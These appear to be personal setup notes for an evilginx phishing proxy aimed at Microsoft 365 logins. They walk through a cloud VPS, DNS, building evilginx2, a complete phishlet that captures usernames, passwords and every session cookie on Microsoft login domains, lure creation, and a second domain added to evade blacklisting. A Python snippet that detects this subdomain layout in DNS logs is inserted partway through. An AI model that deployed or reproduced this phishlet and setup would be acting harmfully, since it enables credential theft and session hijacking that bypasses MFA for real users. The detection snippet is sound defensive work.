Setting up the domain1

Setting up the nameservers ~ Route53

Setting up the VPS ~ EC2

Ubuntu free tier
Generate ssh key pair

Network Settings

Allow SSH only from the local computer's IP, which can be found with:

curl http://ipinfo.io/ip

Allow HTTP/S and DNS from 0.0.0.0 (anywhere) ~~> Launch

setting up evilginx in instance

sudo apt update
# Installing Go
cd ~
curl -OL https://golang.org/dl/go1.21.6.linux-amd64.tar.gz
# compare the output with the checksum published on the Go downloads page
sha256sum go1.21.6.linux-amd64.tar.gz
sudo tar -C /usr/local -xvf go1.21.6.linux-amd64.tar.gz
nano ~/.profile
# add this line to ~/.profile:
# export PATH=$PATH:/usr/local/go/bin
source ~/.profile
go version

git clone https://github.com/kgretzky/evilginx2.git
cd evilginx2
make
sudo ./build/evilginx -p /phishlets/

## help ~~ ## config domain 1 ~~ ## config ipv4
### domain pointing to instance public ip
## setting up the phishlets
## phishlets hostname m365 domain1
## phishlets enable m365

The phishlet in my case is m365

min_ver: '3.2.0'
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session:true, is_landing: true}
  - {phish_sub: 'logon', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: true, is_landing: false}
sub_filters:
auth_tokens:
  - domain: '.live.com' #domain that sends the cookie
    keys: ['.*:regexp'] #name of cookie to steal
  - domain: 'live.com'
    keys: ['.*:regexp']
  - domain: '.login.live.com'
    keys: ['.*:regexp']
  - domain: 'login.live.com'
    keys: ['.*:regexp']
  - domain: '.login.microsoftonline.com'
    keys: ['.*:regexp']
  - domain: 'login.microsoftonline.com'
    keys: ['.*:regexp']  
  - domain: '.microsoft.com'
    keys: ['.*:regexp'] 
  - domain: 'microsoft.com'
    keys: ['.*:regexp']
  - domain: '.office.com'
    keys: ['.*:regexp']
  - domain: 'office.com'
    keys: ['.*:regexp']
  - domain: '.www.office.com'
    keys: ['.*:regexp']
  - domain: 'www.office.com'
    keys: ['.*:regexp']
auth_urls:
  - '/landingv2'
credentials:
  username:
    key: 'login'
    search: '(.*)'
    type: 'post'
  password:
    key: 'passwd'
    search: '(.*)'
    type: 'post'
login:
  domain: 'login.microsoftonline.com'
  path: '/' # path to where the login is, on the domain.    

pointing subdomains of domain 1 to phishlets subdomain

login
logon and
www ~~> to the domain1 ip that is the instance ip running the server
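
Seen from the defender's side, the layout above (the login, logon and www labels under one registered domain, all resolving to a single IP) can be looked for in DNS resolver logs. The following is an added example, not part of the original notes or of the evilginx project; the log format, the sample domains and the allow-list of legitimate parent domains are constructed assumptions.

```python
from collections import defaultdict

# Leftmost labels the notes assign to the proxy hosts (the phish_sub values).
PROXY_LABELS = {"login", "logon", "www"}
# Parent domains that legitimately serve these hosts (assumed allow-list, taken from the config above).
LEGIT_DOMAINS = {"microsoftonline.com", "live.com", "office.com", "microsoft.com"}

# Constructed sample resolver log: "timestamp client qname answer_ip".
SAMPLE_LOG = """\
2024-02-01T09:00:01Z 10.0.0.5 login.microsoftonline.com 203.0.113.10
2024-02-01T09:00:02Z 10.0.0.5 www.office.com 203.0.113.11
2024-02-01T09:01:10Z 10.0.0.7 login.portal-example.test 198.51.100.23
2024-02-01T09:01:11Z 10.0.0.7 logon.portal-example.test 198.51.100.23
2024-02-01T09:01:12Z 10.0.0.7 www.portal-example.test 198.51.100.23
2024-02-01T09:02:00Z 10.0.0.9 www.shop-example.test 192.0.2.44
2024-02-01T09:02:05Z 10.0.0.9 login.shop-example.test 192.0.2.45
"""

def split_host(qname):
    """Return (leftmost label, parent). Naive split: everything after the first label is the parent."""
    label, _, parent = qname.lower().rstrip(".").partition(".")
    return label, parent

def find_proxy_layouts(log_text, min_labels=3):
    """Flag non-allow-listed parents where >= min_labels of PROXY_LABELS resolve to one IP."""
    labels = defaultdict(set)    # (parent, ip) -> proxy labels seen
    clients = defaultdict(set)   # (parent, ip) -> internal clients that resolved them
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines
        _, client, qname, ip = parts
        label, parent = split_host(qname)
        if label in PROXY_LABELS and parent and parent not in LEGIT_DOMAINS:
            labels[(parent, ip)].add(label)
            clients[(parent, ip)].add(client)
    return [
        {"domain": parent, "ip": ip, "labels": sorted(found),
         "clients": sorted(clients[(parent, ip)])}
        for (parent, ip), found in sorted(labels.items())
        if len(found) >= min_labels
    ]

if __name__ == "__main__":
    for hit in find_proxy_layouts(SAMPLE_LOG):
        print(hit)
```

The clients field lists the internal hosts that resolved the flagged names, which is where sign-in log review and session revocation would start.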

creating lures in evilginx

## in evilginx
lures create m365
lures get-url <id>

Adding another domain to prevent BLACKLISTING

Adding another apache server

Next part in domain 2